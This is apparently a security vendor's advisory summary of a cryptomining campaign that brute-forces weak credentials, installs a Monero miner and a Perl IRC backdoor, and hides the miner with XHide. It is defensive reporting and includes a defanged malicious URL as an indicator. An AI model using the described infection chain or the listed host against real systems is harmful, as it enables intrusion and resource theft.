A Trend Micro honeypot detected a cryptocurrency-mining threat on a compromised site, where the URL hxxps://upajmeter[.]com/assets/.style/min was used by the miner to host the command for downloading the main shell script (detected by Trend Micro as Trojan.SH.MALXMR.UWEJS).
The cryptocurrency-miner, a multi-component threat comprised of different Perl and Bash scripts, miner binaries, the application hider Xhide, and a scanner tool, propagates by scanning vulnerable machines and brute-forcing (primarily default) credentials.
Analysis of the threat revealed that the threat actor behind the malicious activity executes component files that run multiple times daily so that the infected machine’s status is regularly sent to the command-and-control server (C&C). The shell script used in the infection is also capable of downloading archived files that contain the miner’s scanner, hider, and final payload.
The threat also employs a process hider to conceal the miner binary, which makes a typical user more unlikely to notice the mining activity save for a drop in performance and suspicious network traffic. This method has been a known cover for threat actors that aim to scan, brute force, and mine.
We detected a threat that propagates by scanning for open ports and brute forcing weak credentials, installing a Monero cryptocurrency miner and a Perl-based IRC backdoor as the final payload. The miner process is hidden using XHide Process Faker, a 17-year old open source tool used to fake the name of a process. Read More